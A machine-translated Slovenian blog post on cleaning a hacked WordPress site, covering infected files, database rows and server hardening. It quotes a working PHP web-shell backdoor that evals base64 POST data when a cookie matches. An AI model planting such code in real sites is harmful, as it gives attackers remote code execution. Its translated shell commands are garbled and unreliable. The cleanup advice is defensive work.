WordPress Izkoriščanje - Počistite virusne datoteke, SQL in varnost strežnika.

Preden boste brali ta post, bi morali videti post tukaj, Da bi razumeli, kaj. :)

Našel sem ga v več datotekah bloga na stealthsettings.com, kode, podobne spodnjim, ki so se pojavile kot posledica virusa z podvig WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcČe je navedeno o datoteki xmlrpc.php iz zaspani, Na grep strežnik, izgleda precej veliko te vrste v izvorne kode.

pppffiuuu

Čiščenje okuženih datotek:

Ooookkkk ...
1. Najboljša rešitev, kot je to storjeno backupIn očistiti Baza odstrani Datoteke WordPress (wp-config.php in datoteke, ki niso natančno povezane s platformo wp, lahko obdržite s strežnika in naložite izvirnike iz različice 2.5.1 (Ob tej priložnosti in si za nadgradnjo wp :)) http://wordpress.org/download/ . Obrišite tudi tematske datoteke, če ne zaupate, da svojo skrbno preverjanje.

Zdi se, da so bili prizadeti in datoteke za teme, ki niso bili uporabljeni, preden se na blog in enostavno spreminjanje teme, ne reši problema.

./andreea/wp-content/themes/default/index.php:

2. Iskanje in izbrišite vse datoteke, ki vsebujejo:... * _new.php, * _old.php, * Jpgg, * Giff, * Pngg in wp-info.txt datoteko, če sploh.

najti. -ime “* _new.php”
najti. -ime “* _old.php”
najti. -ime "* .jpgg"
najti. -ime “* _giff”
najti. -ime “* _pngg”
najti. -ime “wp-info.txt”

3. v / Tmp , Iskanje in brisanje map kot tmpYwbzT2

SQL za čiščenje :

1. v tabeli tabeli wp_options Preverite in brisanje vrstic: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Vse v wp_options, Pojdi do active_plugins in brisanje, če obstaja plugin, ki se konča v eni od končnice * _new.php, * _old.php, *. jpgg, *. giff, *. pngg ali če se sumi drugo podaljšanje, skrbno preverite.

3. V tabeli wp_users, Glej, če je uporabnik, ki ni napisal ničesar v njegovo pravico, stolpec user_nicename. Izbrišite tega uporabnika, vendar si zapomnite številko v stolpcu ID. Ta uporabnik bo verjetno uporabljal "WordPress”Ca user_login je ustvarjena in se pojavlja na 00: 00: 00 0000-00-00.

4. Pojdi na tabeli wp_usermeta in izbrisati vse vrstice, ki pripadajo ID zgoraj.

Ko opravite to čiščenje sql, onemogočite in nato aktivirajte kateri koli vtičnik. (v blogu -> Nadzorna plošča -> Vtičniki)

Varen strežnik:

1. Poglejte, kaj imenike in datoteke "zapisljiv"(chmod 777) in poskusite postaviti a chmod ki ne bo več dovoljevala njihovega pisanja na nobeni ravni. (chmod 644, na primer)

Najdi. -Perm-2-LS

2. Poglejte, kaj so datoteke bit niz suid ali nastavljeno na . Če ne uporabljate te datoteke dal na njih chmod 0 ali odstranite paket, ki jih vsebuje. So zelo nevaren, ker izvaja privilegije "skupina"Ali"koren"Ne z običajnimi privilegiji uporabnika za izvršitev te datoteke.

Ugotovijo /-type f-perm-04000-ls
Ugotovijo /-type f-perm-02000-ls

3. Preverite, kaj so odprta vrata in poskusite zapreti in zavarovati tiste, ki se ne uporabljajo.

netstat-| grep-i poslušati

Toliko. Vidim Nekateri blogi so prepovedane de Google Search in drugi pravijo "Dobro jih je naredil!!!" . No, jaz bi to naredil namesto njih ... ampak kaj pravite, če Google začne prepovedovati Vse strani oblikovanje  JE SPAM in dal Trojanci (Trojan.Clicker.HTML) v piškotkih?

Strasten do tehnologije, z veseljem pišem na StealthSettings.com od leta 2006. Imam bogate izkušnje s operacijskimi sistemi: macOS, Windows in Linux, ter programskimi jeziki in platformami za bloganje (WordPress) in za spletne trgovine (WooCommerce, Magento, PrestaShop).

kako » AntiVirus in varnost » WordPress Izkoriščanje - Počistite virusne datoteke, SQL in varnost strežnika.

1 misel na "WordPress Izkoriščanje - Počistite virusne datoteke, SQL in varnost strežnika.

Pustite komentar